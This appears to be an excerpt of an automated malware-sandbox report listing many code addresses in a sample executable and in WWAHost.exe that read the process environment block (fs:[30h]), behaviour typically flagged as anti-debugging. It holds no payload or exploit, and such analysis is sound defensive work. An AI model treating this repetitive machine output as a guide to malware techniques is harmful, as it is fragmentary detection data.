          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B89240 mov eax, dword ptr fs:[00000030h]1_2_00B89240
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B89240 mov eax, dword ptr fs:[00000030h]1_2_00B89240
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C053CA mov eax, dword ptr fs:[00000030h]1_2_00C053CA
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C053CA mov eax, dword ptr fs:[00000030h]1_2_00C053CA
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB4BAD mov eax, dword ptr fs:[00000030h]1_2_00BB4BAD
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB4BAD mov eax, dword ptr fs:[00000030h]1_2_00BB4BAD
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB4BAD mov eax, dword ptr fs:[00000030h]1_2_00BB4BAD
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBB390 mov eax, dword ptr fs:[00000030h]1_2_00BBB390
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB2397 mov eax, dword ptr fs:[00000030h]1_2_00BB2397
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B91B8F mov eax, dword ptr fs:[00000030h]1_2_00B91B8F
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B91B8F mov eax, dword ptr fs:[00000030h]1_2_00B91B8F
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C3D380 mov ecx, dword ptr fs:[00000030h]1_2_00C3D380
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4138A mov eax, dword ptr fs:[00000030h]1_2_00C4138A
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BADBE9 mov eax, dword ptr fs:[00000030h]1_2_00BADBE9
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h]1_2_00BB03E2
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h]1_2_00BB03E2
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h]1_2_00BB03E2
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h]1_2_00BB03E2
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h]1_2_00BB03E2
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h]1_2_00BB03E2
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C55BA5 mov eax, dword ptr fs:[00000030h]1_2_00C55BA5
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C58B58 mov eax, dword ptr fs:[00000030h]1_2_00C58B58
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB3B7A mov eax, dword ptr fs:[00000030h]1_2_00BB3B7A
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB3B7A mov eax, dword ptr fs:[00000030h]1_2_00BB3B7A
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8DB60 mov ecx, dword ptr fs:[00000030h]1_2_00B8DB60
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4131B mov eax, dword ptr fs:[00000030h]1_2_00C4131B
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8F358 mov eax, dword ptr fs:[00000030h]1_2_00B8F358
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8DB40 mov eax, dword ptr fs:[00000030h]1_2_00B8DB40
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C58CD6 mov eax, dword ptr fs:[00000030h]1_2_00C58CD6
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9849B mov eax, dword ptr fs:[00000030h]1_2_00B9849B
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06CF0 mov eax, dword ptr fs:[00000030h]1_2_00C06CF0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06CF0 mov eax, dword ptr fs:[00000030h]1_2_00C06CF0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06CF0 mov eax, dword ptr fs:[00000030h]1_2_00C06CF0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C414FB mov eax, dword ptr fs:[00000030h]1_2_00C414FB
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C1C450 mov eax, dword ptr fs:[00000030h]1_2_00C1C450
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C1C450 mov eax, dword ptr fs:[00000030h]1_2_00C1C450
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBBC2C mov eax, dword ptr fs:[00000030h]1_2_00BBBC2C
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]1_2_00C41C06
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]1_2_00C41C06
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]1_2_00C41C06
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]1_2_00C41C06
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]1_2_00C41C06
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]1_2_00C41C06
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]1_2_00C41C06
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]1_2_00C41C06
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]1_2_00C41C06
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]1_2_00C41C06
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]1_2_00C41C06
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]1_2_00C41C06
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]1_2_00C41C06
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]1_2_00C41C06
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C5740D mov eax, dword ptr fs:[00000030h]1_2_00C5740D
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C5740D mov eax, dword ptr fs:[00000030h]1_2_00C5740D
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C5740D mov eax, dword ptr fs:[00000030h]1_2_00C5740D
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06C0A mov eax, dword ptr fs:[00000030h]1_2_00C06C0A
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06C0A mov eax, dword ptr fs:[00000030h]1_2_00C06C0A
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06C0A mov eax, dword ptr fs:[00000030h]1_2_00C06C0A
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06C0A mov eax, dword ptr fs:[00000030h]1_2_00C06C0A
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA746D mov eax, dword ptr fs:[00000030h]1_2_00BA746D
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBA44B mov eax, dword ptr fs:[00000030h]1_2_00BBA44B
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h]1_2_00C06DC9
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h]1_2_00C06DC9
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h]1_2_00C06DC9
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06DC9 mov ecx, dword ptr fs:[00000030h]1_2_00C06DC9
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h]1_2_00C06DC9
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h]1_2_00C06DC9
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]1_2_00BB1DB5
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]1_2_00BB1DB5
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]1_2_00BB1DB5
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB35A1 mov eax, dword ptr fs:[00000030h]1_2_00BB35A1
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBFD9B mov eax, dword ptr fs:[00000030h]1_2_00BBFD9B
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBFD9B mov eax, dword ptr fs:[00000030h]1_2_00BBFD9B
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4FDE2 mov eax, dword ptr fs:[00000030h]1_2_00C4FDE2
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4FDE2 mov eax, dword ptr fs:[00000030h]1_2_00C4FDE2
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4FDE2 mov eax, dword ptr fs:[00000030h]1_2_00C4FDE2
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4FDE2 mov eax, dword ptr fs:[00000030h]1_2_00C4FDE2
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C38DF1 mov eax, dword ptr fs:[00000030h]1_2_00C38DF1
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h]1_2_00B82D8A
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h]1_2_00B82D8A
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h]1_2_00B82D8A
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h]1_2_00B82D8A
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B82D8A mov eax, dword ptr fs:[00000030h]1_2_00B82D8A
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB2581 mov eax, dword ptr fs:[00000030h]1_2_00BB2581
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB2581 mov eax, dword ptr fs:[00000030h]1_2_00BB2581
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB2581 mov eax, dword ptr fs:[00000030h]1_2_00BB2581
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB2581 mov eax, dword ptr fs:[00000030h]1_2_00BB2581
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9D5E0 mov eax, dword ptr fs:[00000030h]1_2_00B9D5E0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9D5E0 mov eax, dword ptr fs:[00000030h]1_2_00B9D5E0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C505AC mov eax, dword ptr fs:[00000030h]1_2_00C505AC
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C505AC mov eax, dword ptr fs:[00000030h]1_2_00C505AC
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB4D3B mov eax, dword ptr fs:[00000030h]1_2_00BB4D3B
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB4D3B mov eax, dword ptr fs:[00000030h]1_2_00BB4D3B
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB4D3B mov eax, dword ptr fs:[00000030h]1_2_00BB4D3B
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C03540 mov eax, dword ptr fs:[00000030h]1_2_00C03540
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8AD30 mov eax, dword ptr fs:[00000030h]1_2_00B8AD30
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]1_2_00B93D34
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]1_2_00B93D34
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]1_2_00B93D34
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]1_2_00B93D34
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]1_2_00B93D34
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]1_2_00B93D34
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]1_2_00B93D34
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]1_2_00B93D34
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]1_2_00B93D34
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]1_2_00B93D34
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]1_2_00B93D34
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]1_2_00B93D34
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h]1_2_00B93D34
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BAC577 mov eax, dword ptr fs:[00000030h]1_2_00BAC577
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BAC577 mov eax, dword ptr fs:[00000030h]1_2_00BAC577
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA7D50 mov eax, dword ptr fs:[00000030h]1_2_00BA7D50
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C58D34 mov eax, dword ptr fs:[00000030h]1_2_00C58D34
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C0A537 mov eax, dword ptr fs:[00000030h]1_2_00C0A537
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4E539 mov eax, dword ptr fs:[00000030h]1_2_00C4E539
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC3D43 mov eax, dword ptr fs:[00000030h]1_2_00BC3D43
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C3FEC0 mov eax, dword ptr fs:[00000030h]1_2_00C3FEC0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03851B8F mov eax, dword ptr fs:[00000030h]7_2_03851B8F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03851B8F mov eax, dword ptr fs:[00000030h]7_2_03851B8F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038FD380 mov ecx, dword ptr fs:[00000030h]7_2_038FD380
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872397 mov eax, dword ptr fs:[00000030h]7_2_03872397
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03858794 mov eax, dword ptr fs:[00000030h]7_2_03858794
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387B390 mov eax, dword ptr fs:[00000030h]7_2_0387B390
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C7794 mov eax, dword ptr fs:[00000030h]7_2_038C7794
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C7794 mov eax, dword ptr fs:[00000030h]7_2_038C7794
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C7794 mov eax, dword ptr fs:[00000030h]7_2_038C7794
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0390138A mov eax, dword ptr fs:[00000030h]7_2_0390138A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03915BA5 mov eax, dword ptr fs:[00000030h]7_2_03915BA5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C53CA mov eax, dword ptr fs:[00000030h]7_2_038C53CA
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C53CA mov eax, dword ptr fs:[00000030h]7_2_038C53CA
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h]7_2_038703E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h]7_2_038703E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h]7_2_038703E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h]7_2_038703E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h]7_2_038703E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h]7_2_038703E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038837F5 mov eax, dword ptr fs:[00000030h]7_2_038837F5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387A70E mov eax, dword ptr fs:[00000030h]7_2_0387A70E
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387A70E mov eax, dword ptr fs:[00000030h]7_2_0387A70E
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0390131B mov eax, dword ptr fs:[00000030h]7_2_0390131B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386F716 mov eax, dword ptr fs:[00000030h]7_2_0386F716
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0391070D mov eax, dword ptr fs:[00000030h]7_2_0391070D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0391070D mov eax, dword ptr fs:[00000030h]7_2_0391070D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DFF10 mov eax, dword ptr fs:[00000030h]7_2_038DFF10
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DFF10 mov eax, dword ptr fs:[00000030h]7_2_038DFF10
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03844F2E mov eax, dword ptr fs:[00000030h]7_2_03844F2E
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03844F2E mov eax, dword ptr fs:[00000030h]7_2_03844F2E
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387E730 mov eax, dword ptr fs:[00000030h]7_2_0387E730
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384DB40 mov eax, dword ptr fs:[00000030h]7_2_0384DB40
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385EF40 mov eax, dword ptr fs:[00000030h]7_2_0385EF40
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03918B58 mov eax, dword ptr fs:[00000030h]7_2_03918B58
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384F358 mov eax, dword ptr fs:[00000030h]7_2_0384F358
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384DB60 mov ecx, dword ptr fs:[00000030h]7_2_0384DB60
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385FF60 mov eax, dword ptr fs:[00000030h]7_2_0385FF60
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03918F6A mov eax, dword ptr fs:[00000030h]7_2_03918F6A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03873B7A mov eax, dword ptr fs:[00000030h]7_2_03873B7A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03873B7A mov eax, dword ptr fs:[00000030h]7_2_03873B7A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DFE87 mov eax, dword ptr fs:[00000030h]7_2_038DFE87
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387D294 mov eax, dword ptr fs:[00000030h]7_2_0387D294
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387D294 mov eax, dword ptr fs:[00000030h]7_2_0387D294
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h]7_2_038452A5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h]7_2_038452A5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h]7_2_038452A5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h]7_2_038452A5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h]7_2_038452A5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C46A7 mov eax, dword ptr fs:[00000030h]7_2_038C46A7
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03910EA5 mov eax, dword ptr fs:[00000030h]7_2_03910EA5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03910EA5 mov eax, dword ptr fs:[00000030h]7_2_03910EA5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03910EA5 mov eax, dword ptr fs:[00000030h]7_2_03910EA5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385AAB0 mov eax, dword ptr fs:[00000030h]7_2_0385AAB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385AAB0 mov eax, dword ptr fs:[00000030h]7_2_0385AAB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387FAB0 mov eax, dword ptr fs:[00000030h]7_2_0387FAB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03918ED6 mov eax, dword ptr fs:[00000030h]7_2_03918ED6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038736CC mov eax, dword ptr fs:[00000030h]7_2_038736CC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872ACB mov eax, dword ptr fs:[00000030h]7_2_03872ACB
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038FFEC0 mov eax, dword ptr fs:[00000030h]7_2_038FFEC0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03888EC7 mov eax, dword ptr fs:[00000030h]7_2_03888EC7
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872AE4 mov eax, dword ptr fs:[00000030h]7_2_03872AE4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038716E0 mov ecx, dword ptr fs:[00000030h]7_2_038716E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038576E2 mov eax, dword ptr fs:[00000030h]7_2_038576E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384C600 mov eax, dword ptr fs:[00000030h]7_2_0384C600
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384C600 mov eax, dword ptr fs:[00000030h]7_2_0384C600
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384C600 mov eax, dword ptr fs:[00000030h]7_2_0384C600
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03878E00 mov eax, dword ptr fs:[00000030h]7_2_03878E00
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03858A0A mov eax, dword ptr fs:[00000030h]7_2_03858A0A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384AA16 mov eax, dword ptr fs:[00000030h]7_2_0384AA16
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384AA16 mov eax, dword ptr fs:[00000030h]7_2_0384AA16
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03863A1C mov eax, dword ptr fs:[00000030h]7_2_03863A1C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387A61C mov eax, dword ptr fs:[00000030h]7_2_0387A61C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387A61C mov eax, dword ptr fs:[00000030h]7_2_0387A61C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384E620 mov eax, dword ptr fs:[00000030h]7_2_0384E620
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038FFE3F mov eax, dword ptr fs:[00000030h]7_2_038FFE3F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849240 mov eax, dword ptr fs:[00000030h]7_2_03849240
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849240 mov eax, dword ptr fs:[00000030h]7_2_03849240
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849240 mov eax, dword ptr fs:[00000030h]7_2_03849240
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849240 mov eax, dword ptr fs:[00000030h]7_2_03849240
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h]7_2_03857E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h]7_2_03857E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h]7_2_03857E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h]7_2_03857E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h]7_2_03857E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h]7_2_03857E41
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038D4257 mov eax, dword ptr fs:[00000030h]7_2_038D4257
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385766D mov eax, dword ptr fs:[00000030h]7_2_0385766D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038FB260 mov eax, dword ptr fs:[00000030h]7_2_038FB260
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038FB260 mov eax, dword ptr fs:[00000030h]7_2_038FB260
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0388927A mov eax, dword ptr fs:[00000030h]7_2_0388927A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03918A62 mov eax, dword ptr fs:[00000030h]7_2_03918A62
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h]7_2_0386AE73
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h]7_2_0386AE73
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h]7_2_0386AE73
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h]7_2_0386AE73
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h]7_2_0386AE73
